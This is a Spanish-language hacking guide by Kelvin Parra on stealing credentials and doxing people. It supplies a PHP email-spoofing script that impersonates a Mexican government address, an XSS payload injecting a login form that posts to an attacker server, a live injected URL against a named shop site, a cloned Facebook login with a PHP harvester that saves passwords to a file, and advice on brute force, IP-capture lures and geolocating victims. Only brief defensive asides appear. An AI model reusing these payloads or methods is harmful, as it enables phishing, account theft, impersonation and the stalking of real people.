Está en la página 1de 39

Autor: Kelvin Parra

Twitter
Facebook
Hacking Social
- Una buena cantidad de técnicas que pueden ayudarte a robar credenciales -
- Autor: Kelvin Parra -

​K​elvin security: ​Durante un tiempo nuestras técnicas se basaron email


spoofing o utilizar phishing cada dia crece mas la cantidad de técnicas que
faltan por ser desarrolladas podemos hoy en día crear una aplicación falsa en
redes sociales o simplemente infectar el navegador con un potencial
“Troyano” para recibir credenciales de distintas redes sociales y estas ser
almacenadas en una página externa.

en el caso de kelvinsecurity puedes conseguir nuestros ataques ​Aqui! en


nuestro canal en pastebin estos ataques son realizados mayormente por SQLi
Injection pero no podemos tomar una contraseña que el usuario establece por
defecto en otra página muchas veces estas no suelen ser las correctas para
autentificarse en una red social o página bancaria pero lo que sí podemos
realizar es un ataque directo a estos correos electrónicos hoy aprenderás
distintas técnicas y sobre todo manipulando la mente de nuestras víctimas y
tener el control sobre ellas.

como ejemplo puedes observar esa credencial básicamente estas credenciales


nunca identificaran sabemos que esta credencial conocido como “​cristian​” es
una contraseña por defecto que hemos encontrada de categoría “Information
disclosure” claro una fuga de datos tenemos que tener claro que las
contraseñas más utilizadas son “​cristian1992​” como ejemplo.
1 - Doxeando A Mi Víctima

​ plicaremos el método de doxeo necesitamos información de una persona saber


A
todos sus contactos y sus direcciones e información personal nos basamos en una
búsqueda de “Regiones” si la víctima es de mexico utilizaremos los portales como
ejemplo de consultas por medio de D.N.I en áreas de “pagos en línea” “historial
universitario” “registro nacional” y posibles paginas sociales.

- información darknet

como observaras en la darknet se ha prestado mucho para esto existen portales


donde puedes publicar datos de tus víctimas creando un directorio en formato de
text/plain con información personal:

¿Qué Información?

- Correo Electrónico
- Celular Y Teléfono Personal y Local
- Dirección De Vivienda Exacta
- GeoLocalización
- SSN
- Historial Bancario
- Chats Y Amigos
- Contraseñas Débiles
- Redes Sociales Perfiles
- Historial De Trabajo
en otros casos también podemos incluir información de los servicios básicos de
nuestra víctima.
H​erramientas:

Pipl - Busca información social perfiles de usuario y registros


Spokeo - Busca Perfiles Sociales De Usuario
Linkedin - empleo asocia gran cantidad de usuarios
instantcheckmate Records People Busca Personas
beenverified - Busca personas nombres
ReversephoneNumber - Números Telefónicos
whitepages - Buscar Números Telefónicos
Validador De SSN
Buscar SSN Y Personas
D​orks buscando con ellas:

antes de seguir e aca la tabla de comandos:

ext especifica el formato de búsqueda

inurl búsqueda mediante dirección url

site especificación del portal

| barra separadora de búsqueda

Podemos obtener información pública de portales una de ella son los currículos
podríamos utilizar esta búsqueda de currículos por medio de dorks de igual manera
podríamos consultar a Linkedin.

- Ejemplo “site:mx ext:pdf curriculum vitae”

También podemos incluir un nombre y por arte de magia quizás sea el de nuestra
víctima.

- Resultado “site:mx ext:pdf curriculum vitae Ignacio Eduardo”


- D​orks utilizando redes sociales

Es importante las dorks en el entorno de las redes sociales podemos aplicar el


“site” y quizás un formato o nombre de nuestra víctima.

site:plus.google.com (nombre)
site:linkedin.com (nombre)
site:twitter.com (nombre)
site:paypal.com/cgi-bin (nombre)
-
- búsqueda por nombre de usuario

- Perfil Gmail Google

- Perfil Linkedin
- Perfil Twitter

- Historial Paypal

_ Tomando en cuenta las dorks y la básica búsqueda de buscadores de manera


automatiza podemos calcular un perfil correcto de nuestra víctima.

- especificando una búsqueda en perfil


1 - Realizando Un Ataque Directo “STMP”

La costumbre de hoy en día en que un gobierno gasta 15.000.00 dólares en una


plataforma como “zimbra” no se han salvado muchas veces se trata de utilizar una
contraseña por defecto o una contraseña débil estas técnicas suelen ser
rápidamente tomadas.

- puerto stmp en servidores .gob.mx

Cantidad:

Postfix smtpd 37
Microsoft Exchange smtpd 26
Barracuda Networks Spam Firewall smtpd 5
MailEnable smptd 4

Estos productos de correo electrónico pueden ser mucho más vulnerables excepto
Microsoft Exchange stmpd el cual ha recibido mucho soporte después de pasar por
intentos de ataques.

STMP: ​El protocolo de transferencia de correo simple (SMTP) se ha convertido en


el protocolo estándar de Internet para el correo electrónico. Utilizado a menudo
en entornos UNIX y Linux SMTP está ahora conectado de forma íntegra a productos
de correo como Microsoft Exchange. Los servicios SMTP en IIS proporcionan
opciones administrativas para la entrega y la seguridad del correo.
Email Spoofing: ​Email spoofing no es más que la suplantación de correo stmp en
una técnica de email spoofing se puede incluir la básica aquellas de realizar spam
a otros correos alternativos de la web suplantada para realizar ingeniería social,
spam o envío de malware,phishing.

Script PHP básico:

<?php
$to = "MiVictima@gmail.com";
$subject = "Cabeza Titulo";
$txt = "Contenido de mensaje";
$headers = "From: support@presidencia.gob.mx";
mail($to,$subject,$txt,$headers);
?>

$to = destinatario
$subject= titulo cabeza de mensaje
$txt= mensaje
$headers=”From: Correo A Suplantar

Si no está configurado el servidor para prevenir la suplantación de identidad


podemos aplicar el email spoofing nuestro servidor también debe estar configurado
para el uso STMP debemos correr el script en nuestro servidor y ejecutarlo.

Escenario de ataque:​ Cualquier usuario es víctima a la suplantación de su


servidor de correo.

PoC: ​Correo falso en la bandeja de entrada del dominio de correo.

- Scanner con dnsdumpster


S​eguridad anti spoofing:

- Toma De Acciones Anti Spoofing

SPF: Es una protección contra la falsificación de direcciones en el envío de


correo electrónico. Identifica, a través de los registros de nombres de dominio
(​DNS​), a los servidores de correo SMTP autorizados para el transporte de los
mensajes. Este convenio busca ayudar para disminuir abusos como el spam y otros
males del correo electrónico.

DKIM: ​El sistema DKIM (​DomainKeys Identified Mail​) es una evolución del sistema
DomainKeys desarrollado inicialmente por Yahoo como un mecanismo para que un
mail pueda ser validado por un destinatario comprobando de forma inequívoca que
el origen del mismo es realmente el que aparece en las cabeceras del email.

DMARC: ​Después de establecer los sistemas SPF y DKIM, puedes configurar DMARC
añadiendo políticas a los registros DNS de tu dominio en forma de registros TXT
igual que con SPF y con ADSP.
A​taque Al Servidor STMP

- Escenario De Ataque

Como tal SMTP VRFY Scanner no es un ataque directo pero si el servidor SMTP
tiene activadas algunas opciones que podían conducir potencialmente a la
información de fuga de direcciones de correo electrónico esto si puede conducir a
un ataque directo.

“​Esta es una secuencia de comandos python que intenta conectarse en el


puerto 25 y realiza la enumeración automática del nombre de usuario a través
del comando vrfy suministrando un archivo .txt con nombres de usuario​.”

Script Lenguaje Python: ​http://pastebin.com/YiA1XtuW


C​onsejo de prevención:

Problema En General:

El servidor SMTP tenía activadas algunas opciones que podían conducir


potencialmente a la información de fuga de direcciones de correo electrónico
utilizando el comando VRFY.

También se encontró que el ETRN era - al menos en cierta medida - abusable.


Ninguno de los comandos conduce a una explotación directa. El servidor SMTP no
funciona como un relé abierto.

Tomar En Cuenta:

El proveedor de servicios responsable del servidor SMTP deshabilita el comando


VRFY y limita el uso del comando ETRN.
1 - Aplicando Email Spoofing

Aplicaremos el script bajo una extensión .php en nuestro servidor o ejecución


desde la terminal.

<?php
$to = "MiVictima@gmail.com";
$subject = "Cabeza Titulo";
$txt = "Contenido de mensaje";
$headers = "From: support@presidencia.gob.mx";
mail($to,$subject,$txt,$headers);
?>

- Email spoofing llegó a buzón correctamente

El email spoofing es una técnica muy buena en caso que quieras aplicar ingeniería
social o engañar a tu víctima con un falso señuelo.

- dork site:presidencia.gob.mx @presidencia.gob.mx


T​heHarvester:

TheHarvester es una herramienta que podemos utilizar para extraer correos de


un dominio selectivo a ti se ejecuta desde la terminal y se basa en lenguaje python
ahora también incorpora a shodan como motor de busqueda en momentos de
análisis al servidor como por ejemplo “Presidencia.gob.mx”.

recientemente fue incluido shodan existe la anterior versión

GITHUB

- iniciando harvester desde la terminal “Windows”


C​omandos De Harvester:
Comandos:

theharvester.py -d microsoft.com -l Búsquedas mediante el motor de


500 -b google búsqueda Google

theharvester.py -d microsoft.com -b Búsquedas Mediante pgp


pgp

theharvester.py -d microsoft -l 200 -b Búsquedas mediante linkedin


linkedin

-d Dominio a buscar o nombre de la


empresa

-b Fuente de datos (google, baidu, bing,


bingapi, pgp, linkedin, google-profiles

-s Inicio en el número de resultado X


(valor predeterminado 0)

-v Compruebe el nombre de host


mediante resolución DNS y busque
hosts virtuales

-f Guarde los resultados en un archivo


HTML y XML

-n Realiza una consulta inversa de DNS en


todos los rangos descubiertos

-c Realiza una fuerza bruta de DNS para


el nombre de dominio

-t Realizar un descubrimiento de
expansión de TLD DNS

-e Utilice este servidor DNS

-l Limite el número de resultados a


trabajar con (bing va de 50 a 50 res
lts,
B​uscando La Plataforma A WebMailer:

En páginas de gobierno y empresariales toman la preferencia para sus


trabajadores utilizar la plataforma como existen por ejemplo:

mail.presidencia.gob.mx
correo.presidenca.gob.mx
stmp.presidencia.gob.mx

todo ello para que entre personal de gobierno o trabajadores del estado por
ejemplo para saber su dirección es necesario echarle un ojo al MX y para ello
utilizamos “Dnsdumpster” y la extensión o un scanner de puertos como Nmap o
auto detección como shodan utilizando su extensión para navegadores lo puedes
descargar ​Aqui!​.

MX Records ​** This is where email for the domain goes...

0 201.140.104.80 AS18734 Operbes, S.A.


correo3.presidencia.gob.mx. de C.V.
correo3.presidencia.gob.
mx Mexico

DnsDumpster

si observan mas abajo se encuentra c0rre0.presidencia.gob.mx la cual es la


direccion correcta una vez que entramos nos pide credenciales .

pero si entramos veremos un servidor stmp diferente.


Bajo HTTPS puerto 443:

HTTP/1.1 401 Unauthorized


Server: Microsoft-IIS/8.5
request-id: 493b3069-c306-4ffd-be28-26c1acf75901
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
WWW-Authenticate: Basic realm="​c0rre0.emp.gob.mx​"
X-Powered-By: ASP.NET
X-FEServer: EXCH16V02
Date: Fri, 25 Nov 2016 06:25:01 GMT
Content-Length: 0

como vemos la autentificaion es a emp.gob.mx pero esta bloqueado por :

WWW-Authenticate: Basic realm=

para que nosotros observemos la estructura del webmailer debemos saltar esa
barrera es utilizado por muchos y otros utilizan el típico métodos de realizar un
ataque de fuerza bruta para lograr autentificar en esa barrera.

- producto Outlook Web Access

- vulnerabilidad básicas:

Un WebMailer puede ser vulnerable a distintos métodos:

DoS: Bloqueo De Usuario Tras Múltiples Intentos De Accesos O Acciones


Brute Force: Automatizacion De Intentos De Acceso A Cuenta De Usuario
Open Redirect:
mediante de un parámetro de redirección redirect_uri=​www.malware.com se
redirige a la víctima.
Open Redirect​:

mediante una sesión iniciado hackers han llegado a burlar la seguridad desviando
la dirección en este ejemplo redirect_uri=(pagina) en este caso se trata del acceso
a una plataforma de correo.

Dork: inurl:oauth/authorize inurl:redirect_uri=

Ejemplo:

https://www.ejemplo.com/oauth/authorize?response_type=code&client_id=(ID)
&redirect_uri=malware.com/​code.php​&scope=user

Información Sobre Oauth:

Las aplicaciones normales de oauth añaden automáticamente la etiqueta ​http:


// sin mencionar. El desarrollador pierde o deja de usar la tercera devolución de
llamada porque obtiene un ​https: // o por alguna razón. Ataque normalmente o
afortunadamente encuentra que la devolución de llamada está redirigiendo a algún
dominio que no está registrado entonces atacante registra el dominio y roba el
código oauth generado .Este es un error en algunos casos es cuestión de seguridad.

REFERENCIA 1

REFERENCIA 2

Descripción Según OWZAP:

OWZAP​: Los redireccionamientos y reenvíos no validados son posibles cuando


una aplicación web acepta entrada no fiable que podría hacer que la aplicación
web redirija la solicitud a una dirección URL contenida en la entrada no confiable.
Al modificar la entrada de URL no fiable a un sitio malicioso, un atacante puede
iniciar con éxito una estafa de phishing y robar credenciales de usuario. Dado que
el nombre del servidor en el vínculo modificado es idéntico al sitio original, los
intentos de phishing pueden tener una apariencia más confiable. Los ataques de
redireccionamiento y de reenvío no validados también se pueden usar para crear
una URL maliciosa que pase la comprobación del control de acceso de la aplicación
y luego reenvíe al atacante a funciones privilegiadas a las que normalmente no
podrían acceder.
2 - Phishing + Content Spoofing

​ l phishing es un método que ha recorrido por ordenadores de todo el mundo


E
existen phishing por “Content Spoofing” que no es más que aprovechar de una
vulnerabilidad (Cross Site Scripting) y agregar Forms en HTML que tomen los datos
y ser almacenados en un servidor externo a él e aca un ejemplo de content
spoofing:

- nota: el parámetro forms_show_error= está relacionado con el error

e utilizaremos el script “<script>document.body.innerHTML=” para ocultar el FORM


de Forgot Password.

muy bien a continuación necesitamos agregar otro form aprovechando la


vulnerabilidad cross site scripting (XSS) para robar las credenciales-
Ocultar Form:

<script>document.body.innerHTML=

Form Para Agregar:

<h3>Please Enter Your Username and Password to Proceed:</h3><form


method="POST"
action="http://attackerserver/login.php">Username: <input type="text"
name="username" /><br />Password: <input type="password"
name="password" /><br /><input type="submit" value="Login" /></form>

Modificación:

method=”POST” action=”​www.mipagina.com/funcion.php​” - agregar tu servidor


con el PHP script que usualmente utilizamos en phishing-

- Ejemplo Content Spoofing

Función Completa:

https://sw.shop.ca/supplierworld/forgot_password.php?forms_action=forgot_pa
ssword1&forms_show_error=<script>document.body.innerHTML=”<center><h1>K
elvinSecurity</h1><form%20name=login%20action=index.php%20method=post>Us
ername:<input%20type=text%20name=username><br>Password:<input%20type=p
assword%20name=password><br><input%20type=submit%20value=Login%20name=
submit></form></center>”;</script>
P​hishing para facebook o Twitter:
Podemos crear y enviar una imagen que funcione como clickjacking al momento
de clickear la función que debe tomar es el redireccionamiento a la página falsa de
nuestro servidor si no emite “HTML” puede ser alguno como este:

- Ejemplo en webmailer Horde

Hola, Betsy:

Te registraste recientemente en Facebook. Para completar tu registro en


Facebook, confirma tu cuenta.

Gracias.
El equipo de Facebook

Es posible que debas ingresar este código de confirmación:

xxxxx

Facebook te ayuda a comunicarte con tus amigos y a mantenerte en contacto


con ellos. Cuando te unas a Facebook podrás compartir fotos, planificar eventos
y mucho más.

En Gmail - Hotmail se suele visualizar de forma diferente en contenido “HTML”


R​equisitos:
1) phishing montado en el servidor
2) Email Spoofing + PHP script
3) Infraestructura Básica Y Comparación entre un webmailer y gmail o hotmail.

Para crear un phishing lo haremos de la siguiente forma:

- Infraestructura Facebook

- HTML CODE

- PHP SCRIPT
HTML CODE MODIFICACIÓN:

Vincular “PHP SCRIPT” En Action para dar la función al momento de presionar


el botón “entrar”.

<form id="login_form" action="conectar.php" method="post"

USUARIO:

<input type="hidden" id="lgnjs" name="lgnjs" value="n" /><div class="clearfix


_5466 _44mg"><input type="text" class="inputtext _55r1 inputtext _1kbt
inputtext _1kbt" name="email" id="email" tabindex="1" placeholder="Correo
electr&#xf3;nico o n&#xfa;mero de tel&#xe9;fono" value=""

CONTRASEÑA:

<input type="password" class="inputtext _55r1 inputtext _1kbt inputtext _1kbt"


name="pass" id="pass" tabindex="1" placeholder="Contrase&#xf1;a"
aria-label="Contrase&#xf1;a" />

PHP SCRIPT: Funcion de guardar contraseñas en html.

<?php

$usuario = $_POST[ 'email' ];


$password = $_POST[ 'pass' ];
$ip = $_SERVER[ 'REMOTE_ADDR' ];

if( ( empty($usuario)) or (empty($password)) ){


header('location: index.htm');
}else{
//guarderemos en un archivo de texto
$file = fopen('clave.txt','a+');
fwrite($file, "usuario: ".$usuario."\r\ncontrase単a: ".$password."\r\nIP:
".$ip."\r\n=========================\r\n");
fclose($file);
header('location: http://facebook.com/');

}
3 - Búsqueda De Correos Comprometidos

- ¿Me Han Hackeado?

​ ​abemos de los leaks que se han presentado últimamente hoy en día han creado
S
buscadores que hacen posible buscar tu dirección de correo dentro de esa base de
datos para visualizar si tu correo está comprometido con uno de estos masivos
leaks de igual manera las búsquedas en portales donde últimamente se realizan
estos leaks.

Búsqueda mediante la API:

He Sido Hackeado Direccion

Resultado En Pastebin
- R​estos de las fugas

- Información​ detallada de fugas

- O​tras Fuentes:
- Fuente

- I​nfraestructura (DB)
3 - Listado De Contraseñas Comprometidas

VK Password List

Ventaja: Un usuario podría buscar estas dbs y utilizar la contraseña por defecto
contra su víctima.
V​entaja:
Mediante estos últimos leaks se puede realizar un diccionario de contraseñas que
fueron utilizadas para realizar un ataque de fuerza bruta en otras paginas sociales
el problema es que tanto como Twitter y Facebook bloquean los intentos de acceso
“Bloqueando Temporalmente Tu Dirección IP” pero no quedaría tomar estas
contraseñas que fueron las más utilizadas y crear nuestro propio diccionario.txt

F​uerza Bruta Twitter:


Podemos tomar a twitter como un ejemplo para realizar ataques de fuerza bruta
anteriormente los ataques fueron realizados sin problemas y luego con el tiempo
fueron tomados por soporte técnico para evitar el intento de sesión.

- mobile.twitter.com

- Bloqueo de acceso Twitter

Script
3 - Capturar Dirección IP Mediante Señuelo

En un doxing puedes incluir la dirección IP de tu víctima para ello generamos una


dirección o creamos un script en nuestro servidor que sea capaz de realizar esta
función.

Capturar IP Vinculo

- Gestiona 2 links como señuelo

Info: Al momento de la víctima entrar en el enlace la dirección IP con detalles será


enviada a tu dirección de correo.
3 - Geolocalización IP

Por medio de longitud y latitud utilizando el mapa virtual de “google maps” u


otros como mapbox se suelen localizar nuestra víctima una vez aplicado la acción
de captación de dirección IP.

podemos basarnos de una herramienta ejecutada desde la terminal para realizar


una búsqueda que en realidad funciona mediante un servidor web la herramienta
conocida como Tweepy tiene comprometido a muchos usuarios con el objetivo en
que tu dando uso a esta herramientas puedes geolocalizar un usuario de twitter.

¿Qué Es GeoLocalizacion?

La geolocalización es la capacidad para obtener la ubicación geográfica real


de un objeto, como un radar, un teléfono móvil o un ordenador conectado a
Internet. La geolocalización puede referirse a la consulta de la ubicación, o
bien para la consulta real de la ubicación. El término geolocalización está
estrechamente relacionado con el uso de sistemas de posicionamiento.
H​erramientas De Monitoreo Y Para En Redes Sociales:

tinfoleak es una herramienta automatizada que permite detallar el uso de la


cuenta de twitter de tu victima esta herramienta podrá verificar que aplicación de
twitter podría estar utilizando este individuo para autenticación e incluso datos
como desde qué dispositivo se suele conectar.

Detalles De Funciones:

Información básica sobre un usuario de Twitter (nombre, imagen, ubicación,


seguidores, etc.

Dispositivos y sistemas operativos utilizados por el usuario de Twitter

Aplicaciones y redes sociales utilizadas por el usuario de Twitter

Lugar y coordenadas de geolocalización para generar un mapa de seguimiento de


las ubicaciones visitadas
¡Muestre tweets de usuario en Google Earth!

Descargar todas las fotos de un usuario de Twitter

Hashtags utilizados por el usuario de Twitter y cuándo se utilizan (fecha y hora)

Usuario menciona por el usuario de Twitter y cuando se producen (fecha y hora)


Temas utilizados por el usuario de Twitter
- Photo Metadata

- Geolocalización

No se me quedara atrás y existe 2 formas de obtener estos datos puede ser por
medio de esta estructura o por medio de una terminal.

Infraestructura

Open Source
G​eolocalización IP:

N​o es muy complicado y menos llevará mucho que hacer pues solo se trata de
consultar la dirección para obtener detalles sobre esta IP.

Datos Por Obtener:

ASN
City
Country
Country Code
ISP
Latitude
Longtitude
Organization
Region Code
Region Name
Timezone
Zip Code

Detalles que proporciona ip2geolocation desde la terminal suelen ser los mismos
que en ip2geolocation.com pues la funcion basica es consultar al servidor.

http://ip2geolocation.com/?ip=
3 - Information Disclosure Y Metadatos:

Metadatos: ​dentro del entorno de búsqueda de datos que proporcionan los ficheros
sea documentos e imágenes en otros casos “Audios” este método se aplica en la
informática forense en doxing o cualquiera otra investigación independiente se
realizan estos trabajos.

Information Disclosure: ​En pentesting information disclosure se da a conocer


como un usuario “Identificado” mediante un error que se expone en un servidor o
data expuesta. en forma general information disclosure podría tratarse de lo
mismo y cuando aplicamos metadatos podemos darnos cuenta qué information
disclosure si está allí y no es más que un nombre de usuario o autor. las técnicas
de distintos hackers a nivel mundial es sacar metadatos con nombre de usuarios de
documentos de paginas “Objetivos” para luego crear una colección de ellas y
aplicar ataques de fuerza bruta utilizando cada uno de estos usuarios.
M​etadatos en fotografías:

- ejemplo de metadatos en fotografías

La foto que ven como ejemplo fue una fotografía que causó gran importancia
durante tiempos de guerra los terroristas toman fotografías y las publican en redes
sociales pues esta es un ejemplo de como se ha podido localizar mediante
geolocalización e identificar un tipo de cámara utilizada.

por defecto en “Windows” tiene su visualizador de fotografía y luego un botón en


la barra de opcione para detallar la fotografía resulta que aunque descarguemos
cualquier otro software como es ​Foca podría realizar la misma función y gestionar
los mismos “Metadatos” de forma que lo hubiéramos hecho por defecto con las
herramientas que incluye el sistema operativo.
E​xiftool:

P​ara su descarga ingresamos a la página ​Oficial de acuerdo a ti sistema operativo


de igual manera lo ejecutaremos desde una terminal puede ser desde windows o
simplemente podemos descargar para visualizarlo de manera diferente como GUI
version ​ ExifToolGUI​ .

H​erramientas:
geosetter metadata extractor
logipole metadata extractor
ulfwood Metadata Extractor
Foca Metadata Extractor

- Formatos que procesa ExiftTool


-

- Metadatos a extraer dentro del formato

- Sencilla automatización a la fotografía extracción de metadata


- comando : exiftool.exe -v metadata.jpg

- o simplemente: exiftool.exe -v datos.jpg


- borrando metadatos

- Resultado del borrado de metadatos

E​xtraer metadatos de documentos:

comparado con el information disclosure nuestro objetivo sería identificar un


sistema operativo, software y datos de autor y nombres de usuario.
U​tilizando Foca Extraer Metadatos:

Descargar FOCA
-

D​escripcion: Los documentos que es capaz de analizar son muy variados, siendo
los más comunes los archivos de Microsoft Office, Open Office, o ficheros PDF,
aunque también analiza ficheros de Adobe InDesign, o svg por ejemplo.

Estos documentos se buscan utilizando tres posibles buscadores que son Google,
Bing y Exalead. La suma de los tres buscadores hace que se consigan un gran
número de documentos. También existe la posibilidad de añadir ficheros locales
para extraer la información EXIF de archivos gráficos, y antes incluso de descargar
el fichero se ha realizado un análisis completo de la información descubierta a
través de la URL.

- menú para uso de búsqueda mediante dorks

sabemos las funciones básicas en dorks y muestra 3 motores de búsqueda como


Google O Bing sabemos las funciones básicas:

site: especificar una página web


filetype: especificar el formato.
- otra funcion basica de foca es inspeccionar la seguridad del portal web que
estamos analizando para la búsqueda de estos documentos.

bien volvemos a metadata y arrastramos un documento PDF o DOC y luego


presionamos sobre el click derecho y presionamos en extraer metadata el que
quieras y extraemos sus metadatos

- ejemplo durante la extracción de metadatos

También podría gustarte